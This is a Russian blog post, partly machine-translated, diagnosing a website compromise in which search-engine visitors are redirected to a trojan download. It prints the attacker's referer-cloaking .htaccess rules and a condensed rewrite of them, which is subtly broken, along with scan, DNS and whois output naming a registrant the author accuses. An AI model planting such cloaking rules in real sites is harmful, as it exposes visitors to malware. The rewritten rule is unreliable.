Нашел в яндексе список сайтов, которые указывают на мой сайт, сайт заражен каким-то хламом

Оттуда он перенаправляется и именно там он появляется в таком случае, что крайне неудобно в моем GNU/Linux/Debian

Если приглядеться, то видно, что он перенаправляет не всех посетителей, а тех, кто пришел с Яндекса, пытается пройти (дом » Новости » Открыть лампа двигатель.) видимо это сделано для заражения только гостей сайта из поисковиков, а обычные посетители и администраторы такую ​​фигню сразу не заметят, скорее всего передача встроена в .htaccess

Я проверяю это с помощью самого безопасного браузера

wget --referer=""  -O /dev/null

Обнаружение www.pamparam.net… 78.26.128.55
Подключение к www.pamparam.net|78.26.128.55|:80… Соединение установлено.
HTTP-запрос отправлен, ожидается ответ… 302 Временно отложено
Адрес: [переход]
—2009-06-04 13:58:36—
www.spyware-systems.info… Обнаружен адрес 122.224.5.189
Подключение к www.spyware-systems.info|122.224.5.189|:80… Соединение установлено.
HTTP-запрос отправлен, ожидается ответ… 302 Временно отложено
Адрес: [переход]
—2009-06-04 13:58:36—
Tubepornolive.com обнаружен… 194.165.4.77
Подключение к tubepornolive.com|194.165.4.77|:80… Соединение установлено.
HTTP-запрос отправлен, ожидание ответа… 200 OK
Длина: нет данных [text/html]
Хранится в каталоге: «/dev/null».

[  <=>                                                                                                               ] 15 739 44,0 тыс./с при 0,3 с

04.06.2009 13:58:48 (44,0 КБ/с) — «/dev/null» сохранено [15739]

Здесь хорошо видно, что посетители, приходящие с Яндекса, перенаправляются на домен www.spyware-systems.info, смотрим сервер зараженной страницы

wget --no-proxy  -S -O /dev/null 
Запрос HTTP послан, ожидание ответа... 
  HTTP/1.1 200 OK
  Date: Thu, 04 Jun 2009 10:04:37 GMT
  Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
  X-Powered-By: PHP/5.2.6
  Set-Cookie: PHPSESSID=uk28qmlas3ensdpbmqv92u1d76; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT nslookup 78.26.128.55
Server:        192.168.0.78
Address:    192.168.0.78#53
Non-authoritative answer:
55.128.26.78.in-addr.arpa    name = CP.UkrHost.Biz.
Authoritative answers can be found from:
128.26.78.in-addr.arpa    nameserver = ns.Odessa.TV.
128.26.78.in-addr.arpa    nameserver = ns2.Odessa.TV.
ns.Odessa.TV    internet address = 78.26.128.46
ns2.Odessa.TV    internet address = 78.26.128.47
ns2.Odessa.TV    internet address = 78.26.128.41
nmap -A pamparam.net
Starting Nmap 4.53 (  ) at 2009-06-04 14:31 MSD
SCRIPT ENGINE: rpcinfo.nse is not a file.
SCRIPT ENGINE: Aborting script scan.
Interesting ports on CP.UkrHost.Biz (78.26.128.55):
Not shown: 1705 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.2rc3
22/tcp   open  ssh         OpenSSH 4.5p1 (FreeBSD 20040419; protocol 2.0)
25/tcp   open  smtp        qmail smtpd
53/tcp   open  domain
80/tcp   open  http?
443/tcp  open  https?
465/tcp  open  smtps?
587/tcp  open  submission?
2604/tcp open  ospfd?
Service Info: OSs: Unix, FreeBSD
whois www.pamparam.net Registrant:
    N/A
    Syava Tregub        ([email protected])
    Odessa
    Odessa
    ,048
    UA
    Tel. +7.1231234567
Creation Date: 18-Mar-2009  
Expiration Date: 18-Mar-2010
Administrative Contact:
    N/A
    Syava Tregub        ([email protected])
    Odessa
    Odessa
    ,048
    UA
    Tel. +7.1231234567

Делаем выводы: Сайт в CP1251 означает, что Сева Трегуб пользователь Windows, также он написал CMS на PHP и установил на свой хостинг троян, который заражает своих посетителей пользователям Windows — молодец Сева Трегуб

ЧИТАТЬ  Google: перекрестные ссылки в вашем контенте, когда они уместны и соответствуют контексту

Вирусное сообщение в Firefox

ДокторВеб онлайн Определяет вложение Codec.exe как

Проверить: codec.exe
Версия ядра антивируса: 5.0.0.12182
Вирусные записи: 559445
Размер файла: 107,00 КБ
Файл MD5: 9f06d7a07ee5398a73931f64ec16c2a5

codec.exe заражен Trojan.Packed.2463

А Касперский онлайн Как

кодек.exe — Trojan-Downloader.Win32.FraudLoad.wbpw

Вот еще один Один пострадавший заразился этой инфекцией gun.ru, но похоже что-то не срослось и мои предположения о mod_rewrite подтвердились

Сайт заражен вирусом Trojan-Downloader.Win32.FraudLoad.wbpw Trojan.Packed.2463

На зараженных сайтах файл .htaccess содержит следующие команды

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] 
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] 
RewriteRule .*  [R,L]

Удивительно, что взломщик не смог осилить регулярное выражение, такую ​​шнягу можно заменить на 2 строчки

RewriteCond %{HTTP_REFERER} google|msn|yahoo|yandex|rambler|ya|aol [NC,OR]
RewriteRule .*  [R,L]

На лице необразованного Вунтузят

Source